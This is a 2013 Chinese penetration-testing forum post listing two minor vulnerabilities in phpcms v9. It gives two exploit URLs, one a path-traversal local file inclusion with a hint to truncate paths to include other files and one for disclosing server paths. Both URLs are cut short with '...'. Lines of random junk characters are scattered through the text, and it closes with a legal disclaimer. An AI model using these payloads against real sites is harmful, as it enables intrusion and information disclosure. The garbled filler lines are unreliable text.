中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
4 T  ^# i$ a, e; S' ~2 q0 s9 o3 O% ?' a- ~
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
3 w. c: o* c, _5 J7 r5 G
4 h2 s/ c) [( H$ F, u5 _#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
+ Y: |. E. F6 E: y) y
, U2 h7 `3 S6 p0 E# h! D9 N8 a" _Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
- Y' x3 }2 j6 t! ^" i, t
* ?' O' ^) E5 H#暴路径# t+ c- u6 u. W+ E7 s2 k( k
  z7 }: E: x8 w1 V9 W6 V; [% Y) h6 t
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。9 I' D" N2 {3 P7 y5 V; K
6 Q, O4 E6 I/ ~' o- P6 N
# d$ K6 h! F; e7 Q/ ]7 L: u3 x) ?% g
& |- P3 n& i! t6 ~5 i( {' H
+1




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2